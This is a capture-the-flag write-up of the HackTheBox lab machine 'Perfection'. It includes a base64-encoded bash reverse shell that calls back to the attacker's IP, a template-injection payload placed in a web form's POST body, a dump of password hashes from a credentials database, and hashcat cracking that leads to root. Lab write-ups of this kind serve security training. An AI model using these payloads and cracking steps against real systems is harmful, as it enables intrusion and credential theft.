Perfection HTB Writeup | HacktheBox

Introduction

In this post, You will learn how to CTF Perfection from HacktheBox, If you have any doubts comment down below 👇🏾

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on X.

Let’s Hack Perfection HTB 😌

https://twitter.com/HacklikeHacker

Enumeration

First, we start by checking out the target’s IP address using a tool called Nmap. Nmap helps us figure out what ports are open and what services are running on those ports.

So, after running Nmap, we find out that two ports are open: 22 (for SSH) and 80 (for HTTP). This means there might be a way to remotely access the system through SSH, and there’s likely a website hosted on the target.

Also, the details we get from the scan suggest that the operating system is probably Ubuntu Linux.

Now, let’s break down the command “sudo nmap -sC -sV 10.129.216.68”:

  • “sudo” is used to give the command extra permission to do its job properly.
  • “-sC” runs some default scripts to dig deeper into the services and get more info about them.
  • “-sV” tries to figure out the exact version of the services running.
  • And finally, “10.129.216.68” is the IP address we’re targeting.
sudo nmap -sC -sV 10.129.216.68

[sudo] password for kali: 

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 21:47 CET
Nmap scan report for 10.129.216.68
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_  256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open  http    nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds

Website

The HTTP port has a server that serves web pages. This website has places where we can type stuff, and we might be able to put in our own code there.

Start Listener

Next, we’re going to use a tool called Netcat to wait for connections coming in. We’ll use the command “nc -lvnp 7373” to do this. Here, “nc” stands for Netcat, which is a handy networking tool.

The flags we’re using (-l for listen mode, -v for verbose mode, -n to show numeric-only IP addresses, and -p to specify the port) help us set up a listener on port 7373. We’re expecting the target to send us a reverse shell through this port.

nc -lvnp 7373            
                
listening on [any] 7373 ...
connect to [10.10.14.213] from (UNKNOWN) [10.129.216.68] 42582

Generate Payload

Using hURL to encode and decode payloads demonstrates how we can mess around with data to take advantage of weaknesses in web applications.

Specifically, the payload we’re making for the Weighted Grade Calculator app is made to run a reverse shell command. This way, we can exploit any possible vulnerabilities that let us run code on the server’s side.

┌──(kali㉿kali)-[~]
└─$ hURL -B "bash -i >& /dev/tcp/10.10.14.213/7373 0>&1"

Original       :: bash -i >& /dev/tcp/10.10.14.213/7373 0>&1                                                                                                                                                     
base64 ENcoded :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx
                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~]
└─$ hURL -U "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx"

Original    :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx                                                                                                                                          
URL ENcoded :: YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx

Inject Payload

First, use Burpsuite to grab the POST Request. After that, put in the Payload.

Payload

grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx|+base64+-d+|+bash");%25>1

User Flag and Hash

Boom! We’ve got our Reverse Shell Connection. Now, we can get the User Flag and Susan’s hash.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 7373                            
listening on [any] 7373 ...
connect to [10.10.14.213] from (UNKNOWN) [10.129.216.68] 42582
bash: cannot set terminal process group (992): Inappropriate ioctl for device
bash: no job control in this shell
susan@perfection:~/ruby_app$ ls
ls
main.rb
public
views
susan@perfection:~/ruby_app$ cd /home
cd /home
susan@perfection:/home$ ls
ls
susan
susan@perfection:/home$ cd susan
cd susan
susan@perfection:~$ ls
ls
Migration
ruby_app
user.txt
susan@perfection:~$ cat user.txt
cat user.txt
2034XXXXXXXXXXXXXXXXXXXXXXX96ab
susan@perfection:~$ cd Migration
cd Migration
susan@perfection:~/Migration$ ls
ls
pupilpath_credentials.db
susan@perfection:~/Migration$ strings pupilpath_credentials.db
strings pupilpath_credentials.db
SQLite format 3
tableusersusers
CREATE TABLE users (
id INTEGER PRIMARY KEY,
name TEXT,
password TEXT
Stephen Locke154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8S
David Lawrenceff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87aP
Harry Tylerd33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393O
Tina Smithdd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57Q
Susan Miller<HASH>

Crack the Hash

┌──(kali㉿kali)-[~]
└─$ echo "<HASH>" > hash.txt  
                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~]
└─$  hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d 

<HASH>:susan_nasus_4XXXXXXX0
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Thu Mar  7 22:22:07 2024 (2 mins, 16 secs)
Time.Estimated...: Thu Mar  7 22:24:23 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2614.7 kH/s (0.39ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 324558848/1000000000 (32.46%)
Rejected.........: 0/324558848 (0.00%)
Restore.Point....: 324554752/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_058540610 -> susan_nasus_803824210
Hardware.Mon.#1..: Util: 32%

Login with Root

┌──(kali㉿kali)-[~]
└─$  ssh susan@10.129.216.68
susan@perfection:~$ sudo su
root@perfection:/home/susan# cat /root/root.txt
<FLAG>

Conclusion

In summary, this Perfection HTB box offered valuable lessons in network security and penetration testing. Through practical exercises, we learned to identify and exploit vulnerabilities effectively. This experience highlights the importance of robust security measures in protecting systems from cyber threats.


Also Read: HTB Write-ups

Share your love
Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site